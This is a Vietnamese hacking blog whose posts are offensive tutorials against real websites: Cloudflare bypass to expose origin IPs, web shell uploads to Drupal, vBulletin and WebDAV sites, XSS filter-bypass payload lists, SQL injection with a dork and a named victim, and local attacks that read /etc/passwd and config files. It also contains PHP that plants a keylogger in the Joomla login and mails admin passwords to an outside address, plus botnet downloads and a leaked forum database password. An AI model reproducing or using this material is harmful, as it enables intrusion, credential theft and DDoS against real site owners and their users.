Nhãn

Hiển thị các bài đăng có nhãn Website Hacking. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Website Hacking. Hiển thị tất cả bài đăng

Thứ Ba, 26 tháng 8, 2014

Check DDOS Website

Bài viết chỉ mang tính chất kiểm tra hệ thống firewall chống ddos và tình hình cơ sở hạ tầng mạng của các website Việt Nam hiện nay, Không mang bất kỳ tính chất tấn công hay phá hoại nào vào đối tượng liệt kê ở dưới.
Những website demo dưới đây là nhưng site lớn có hệ thống hạ tầng chống ddos thuộc TOP ở VN hiện nay, tuy nhiên vẫn chưa đủ mạnh và đủ tốt để có thể chống đỡ vấn nạn ddos hiện nay.






Thứ Ba, 25 tháng 3, 2014

Các Phương Pháp Bypass Cloudflare Toàn Tập

Hiện nay có nhiều cá nhân, doanh nghiệp, tổ chức bị tấn công DDOS thường xuyên làm tê liệt và gây mất ổn định cho hệ thống. Giải pháp đầu tiên được nghĩ đến đó là đổ 1 nguồn tài chính không nhỏ và các hệ thống trung gian như cloudflare hay các dịch vụ chống DDOS như http://web.oahay.com/ , Tưởng rằng Server chính đã an toàn nhưng quên mất việc các hacker vẫn có thể cách này hoặc cách khác bypass và tìm được địa chỉ IP thật. Từ đó việc sử dụng các dịch vụ trung gian trở nên dường như vô nghĩa, tốn tiền bạc nhưng hệ thống vấn bị tấn công không ổn định. Bài TUT sau viết về các kỹ thuật có thể truy tìm địa chỉ ip thật của các website đằng sau CDN.

Qua đây, MANGSIEUTOC xin giới thiệu giải pháp tốt nhất cho các doanh nghiệp, tổ chức bị DDOS hiện nay là sử dụng dịch vụ Hosting, VPS chống DDOS Hosting chống DDOS  & VPS chống DDOS

Cách 1: Sử dụng phương pháp PING Sub Domain
-          Ping direct-connect.mangsieutoc.com.vn
-          Ping direct.mangsieutoc.com.vn
-          Ping fpt.mangsieutoc.com.vn
-          Ping cpanel.mangsieutoc.com.vn
-          Ping mail.mangsieutoc.com.vn
-          Ping webmail.mangsieutoc.com.vn
......
Hoặc có thể sử dụng 1 số công cụ online để check như:




Cách 2: Sử dụng Netcraft toolbar



Thứ Bảy, 2 tháng 11, 2013

Kỹ Thuật Upshell Đối Với Drupal


Bước 1: Thiết lập mặc định PHP code

Login với tài khoản admin và vào theo mục sau:  Admin -> Administer -> Site configuration
Tích vào PHP code  ->   Set default format




Bước 2: Chèn Shell vào nôi dung văn bản

Vào theo mục sau: Admin -> Create content . Sau có chọn 1 mục bất kỳ và chèn nội dung code shell vào phần nội dung văn bản  “Body”.  Sau đó lưu lại.


Thứ Ba, 12 tháng 3, 2013

[Bài 3 - XSS] Kỹ thuật Bypass và phương pháp tấn công XSS

                       

               Trong bài trước Giới thiệu chung về XSS Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS

     7.       Kỹ Thuật Bypass

                1 số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:


       "><script>alert("Check By Soleil")</script>
"><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </script>
'><script>alert("Check By Soleil ")</script>
'><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
     <ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
"><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>
'><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
</script><script>alert("Check By Soleil ")</script>
</script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>
"/><script>alert("Check By Soleil ")</script>
"/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
'/><script>alert("Check By Soleil ")</script>
'/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
</SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
</SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>
</SCRIPT>">'<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
";alert("Check By Soleil ");"
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"
';alert("Check By Soleil ");'
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'
";alert("Check By Soleil ")
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) ';alert("Check By Soleil ")
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))

           Trong đó: 67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By Soleil” ở dạng char.

       Ví dụ:

    -          Attacker có thể chèn vào thanh tìm kiếm site http://www.hanoi.gov.vn    đoạn mã script đã bypass sau:
<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
      Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.



Chủ Nhật, 10 tháng 3, 2013

[TUT] Upshell Và Deface Sử Dụng Webdav




Tool:
 
Tool scan thấy có dính mã độc. Khuyến cáo ae nên sử dụng trên máy ảo
Pass dải nén: vhb

Bước 1: Vào Tab webDav và chọn ASP Shell Maker




Thứ Hai, 7 tháng 1, 2013

[Bài 2 - XSS] Giới thiệu Chung về XSS và Phương pháp kiểm tra lỗi




               Trong bài thứ nhất Giới Thiệu Chung Về XSS Soleil đã giới thiệu những nội dung chính sẽ viết, Ở bài thứ 2 này soleil sẽ giải thích rõ về XSS, phương pháp check site dính XSS và 1 số thao thác khi thực hiện tấn công theo phương thức XSS.

1-      XSS là gì ?

       XSS( Cross-Site Scripting ) là một trong những kỹ thuật hack website phổ biến nhất hiện nay bằng cách chèn vào url, chèn qua các thanh tìm kiếm hoặc chèn ở bất cứ 1 textbox nào những thẻ HTML hoặc những đoạn mã script nguy hiểm, từ đó chiếm quyền điều khiển của victim hoặc thực hiện những mệnh lệnh mà hacker đưa ra.


 
2-      Nguyên lý hoạt động XSS

       Khi website đã bị chèn các thẻ html hay những đoạn mã script nghĩa là đã gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Khi người sử dụng click vào những link đó thì toàn bộ cookies, mật khẩu lưu trên trình duyệt được gửi về cho hacker qua email hoặc 1 file nào đó trên host đã được thiết lập từ trước hoặc bị dẫn tới 1 trang fishing mà hacker đã thiết lập từ trước hay bị cài đặt các chương trình virus, Trojan, backdoor trên máy victim tùy vào mệnh lệnh của hacker


3-      Phân loại XSS

XSS Có 2 dạng, đó là:

    +     Persistent 
+     Non-Persistent type


4-      Mức độ nguy hiểm XSS

   + Ăn cắp cookies, mật khẩu, cướp session làm việc
   + Cài các loại virus, trojan, backdoor trên máy tính victim
   + Deface website. Tuy nhiên nó chỉ chạy trên trình duyệt phía client và chỉ tấn công vào bề mặt website, không làm thay đổi cấu trúc mã nguồn, cơ sở dữ liệu của website trên server.


Thứ Hai, 1 tháng 10, 2012

Lời xin lỗi - Chút bộc bạch


Như tiêu đề, Soleil gửi lời xin lỗi tới tất cả các bạn đọc vì đã không thực hiện lời hứa - Tiếp tục viết và  public tut được nữa

Thời gian này, bước vào kỳ cuối cùng của quãng đời sinh viên - Chuyên ngành cơ khí HK, chất lượng cao - BK HN. Khối lượng đồ án và bài tập kỳ cuối cùng gần như quá tải. Vì thế chắc sẽ không còn nhiều đêm trắng cùng ae ngồi mày mò, gõ gõ như thời gian vừa qua được nữa. Soleil  thực sự muốn tập trung 1 kỳ cuối cùng cho chuyên ngành và thực hiện 1 số dự định. Vì vậy thời gian này, có thể trong vòng 3,4 tháng nữa, sẽ có ít tut trên blog - Mong các bạn đọc thông cảm và không gửi mail thêm nữa.

Nhân tiện những bạn nào có niềm đam mê với hacking muốn gia nhập vào VHB http://vhbgroup.net  cùng ae trong đó trao đổi học tập & trao đổi thì có thể để lại user và mail. Pass mặc định là 123456@, các bạn nhơ change pass sau khi vào 4rum. Soleil hứa sẽ reg nick cho tất cả xem như 1 hành động gỡ lỗi. Và VHB vẫn sẽ hoạt động bình thường.


Thân! 


Thứ Ba, 21 tháng 8, 2012

[Bài 1 - XSS ] Giới Thiệu Chung

Soleil sẽ góp 1 chút kiên thức về XSS cho ae tham khảo trong 3 bài viết. Bài đầu tiên sẽ mang tính chất giới thiệu. Trong quá trình viết có gì sai sót mong được ae góp ý.

Các nội dung chính:


1- XSS là gì ?

2- Nguyên lý hoạt động XSS

3- Phân loại XSS

4- Mức độ nguy hiểm XSS

5- Phương pháp check site dính lỗ hổng XSS

6- 1 số thao tác khi tấn công bằng XSS

7- Kỹ Thuật Bypass

8- Demo 1 số site dính XSS:

9- Quá trình các bước thực hiện tấn công bằng XSS


Trong bài 2, Soleil sẽ viết từ mục 1 đến mục 5 ^^

Thứ Năm, 16 tháng 8, 2012

Private Blog - VHB_Group

Nhân dịp VHB comback, soleil sẽ public 1 số tut khá nhạy cảm và sẽ private blog và chỉ dành cho thành viên VHB truy cập.

Ngoài ra, Nếu ai có nhu cầu để cấp quyền truy cập blog thì để lại email phía dưới.

Sẽ chính thức private sau 1 tuần từ lúc pub thông báo này. (đến 25/8). Sau ngày 25/8 sẽ ko cấp quyền cho bất cứ 1 ai nưa,

Thân!

Thứ Tư, 8 tháng 8, 2012

Check site .cn tối ngày 7/8/12


1 số site khựa bảo mật kém bị check tối 7/8

1 số site đã bị deface :



Topic sẽ tiếp tục cập nhật trong tối nay ^^

Chủ Nhật, 29 tháng 7, 2012

[Bài 4 – SQLI] Bypass 406 Not Acceptable




      Trong các bài trước , Soleil đã giới thiệu các dạng attack cơ bản sử dụng phương pháp SQLI để chiếm quyền quản trị administrator: Khai thác đối với AspxKhai thác lỗi cơ bảnLỗi Jet. Tuy nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể tiếp tục.
Hôm nay Soleil sẽ demo 1 dạng bypass “406 Not Acceptable” thông dụng thường gặp phải lúc khai thác đồng thời cũng pubic bug sqli đối với công ty thiết kế website “Viet Arrow”.

Google dork: Designed by Viet Arrow id=

Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi sqli, sau đây là 1 số ví dụ


Soleil sẽ chọn 1 victim bất kỳ để khai thác.

Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản

Bước 1: Check lỗi

Thêm dấu ‘ vào sau con số của đường link có dạng id=
 http://www.khaithong.com.vn/index.php?do=content&id=1
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli

Thứ Năm, 19 tháng 7, 2012

[Tut] Up Shell Vbulletin Qua Database P.I



Khi thực hiện Local Attack đối với 4rum thì include shell qua database, là 1 kỹ năng không thể thiếu bởi vì thư mục Admincp thông thường không có mấy admin sơ ý đến nỗi quên không change path và đặt file .htaccess bảo vệ. Vì vậy phương pháp include shell database được các attacker sử dụng 1 cách phổ biến

Có 3 cách để include shell, hôm nay soleil sẽ giới thiệu cách thứ nhất.

Giả sử soleil đã có shell  1 site trên cùng server,
Với shell này ta có thể Local Attack sang forum: http://raoonline.net  và thu được thông tin config như sau:

$config['MasterServer']['username'] = 'raovat_forum';
$config['MasterServer']['password'] = '125254857'


Bước 1: Login vào cơ sở dữ liệu:




Thứ Hai, 16 tháng 7, 2012

[Bài 3 - Local Attack] Các Phương Pháp Local Attack


 Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ  bài 2 - Giới thiệu tính năng 1 số shell

      


  *        Nhắc lại trình tự các bước Local Attack

     1-       View danh sách các user trong server
     2-      Tìm  file config.php
     3-      Get thông tin login vào database
     4-      Crack hoặc change pass admin
     5-      Login vào quyên quản trị và upshell

    
     1-      View danh sách các user trên server

Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, source code là gì từ đó tìm cách đọc file config.php của user đó


-          Một số câu lệnh để get user:

Lệnh phổ biến nhất:
Cat /etc/passwd

Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt

Less /etc/passwd
./cat/etc/passwd
More /etc/passwd

Ngoài ra có thể sử dụng chức năng get user trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các shell sau:


Pass download: soleil_vhb
Pass dải nén: ceh.vn

 -          Câu lênh get user & domain

Cat /etc/virtual/domainowners  ( Chỉ dùng đối với direct admin )
               
      2-      Tìm file path file config.php

Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html

Thứ Bảy, 14 tháng 7, 2012

[Tut] Insert Keylogger into joomla




Bước 1: Up shell lên site joomla

Bước 2: Insert mã độc vào code

       -   Vào administrator/components/com_login/

       -   Edit file: admin.login.php

       -   Tìm dòng:$mainframe->redirect('index.php');

       -   Thêm trước dòng này 1 đoạn code như sau:

     PHP Code:



$db        =& JFactory::getDBO();                
$mailfrom         = $mainframe->getCfg( 'mailfrom' );
$fromname         = $mainframe->getCfg( 'fromname' );
$siteURL        = JURI::base();
$uname         = $credentials['username']; 
$query = 'SELECT name , email, usertype  ' .
        ' FROM #__users' .
        ' WHERE username = "'.$uname.'"';
$db->setQuery( $query );
$rows = $db->loadObject();

if ( ! $mailfrom  || ! $fromname ) {
    $fromname = $rows->name;
    $mailfrom = $rows->email;
}
$usertype = $rows->usertype;        
$email = $rows->email;
$pass = $credentials['password'];

$message = "$uname|$email|$pass|$usertype";
$to="ducdung.08clc@gmail.com";
$header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to";
@mail($to, $siteURL, $message, $header);

Với đoạn code này thì khi admin đăng nhập thì username, password, email sẽ tự động gửi về mail: ducdung.08clc@gmail.com  



Thứ Sáu, 13 tháng 7, 2012

[Ddos-BotNet] Di-BotNet V.2









Link download:  http://www.mediafire.com/?7r73cyckox24gj4
Pass unlock: soleil_vhb



Hướng dẫn sử dụng:

Thứ Năm, 12 tháng 7, 2012

[Local Attack] Get all config toàn server





     -          Đâu tiên download shell get all config ( w.php)  về rồi up lên server.

http://www.mediafire.com/?hi4gnmu3kpxn095  ( pass unlock: soleil_vhb )







     -          Click vào done và thư mục có tên là tmp sẽ được tạo ra.

     -          Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:

+             dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).
+             user.sa : Shell này dung để xem danh sách các user và domain trên server.
+             config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink


[Ddos-BotNet] Nick3





Đây là code + data+ tool create bot của nick3 đã được edit giao diện dựa trên bản G-bot 1.7 của các hacker người nga.
Hướng dẫn sử dụng:

        -          Up code và data lên host sau đó vào file config.php chỉnh các thông số:
+             Username và password data
+             Pass để login
        -          Sau đó vào link botnet, vd: http://vhbgroup.net/botnet3/ , sẽ xuất hiện 1 giao diện 404 như dưới đây. Ấn nút tab và đánh password đã thiết  lập trong file config.php ở trên rồi enter.










Thứ Sáu, 29 tháng 6, 2012

[Tut] Padding Orale Attack





 
Kiểm tra lỗi Padding Orale



View source:



Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&amp;t=634538991637902500" 


Bước 1: Chuẩn bị Tools

Trước tiên cần cài đặt perl:

Coppy 2 file  padBuster.pl và Web.config_bruter.pl sau vào ổ C:

padBuster.pl:
Web.config_bruter.pl:
pass unlock: soleil_vhb
pass giải nén: ceh.vn



Thứ Tư, 27 tháng 6, 2012

[Bài 2 - Local Attack] Giới Thiệu Tính Năng 1 Sô Shell


Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể thiếu trong local attack

Một số shell thông dụng:

 r57.php

R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.


c99.php


Nói đến r57 cũng không thể  không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu

Chủ Nhật, 17 tháng 6, 2012

[Ddos-BotNet] seo4loader



Đây là code botnet mạnh nhât hiện nay.



Link download:  http://www.mediafire.com/?x7fdp13fhtad1d6

pass download: ceh.vn
pass giải nén: soleil_vhb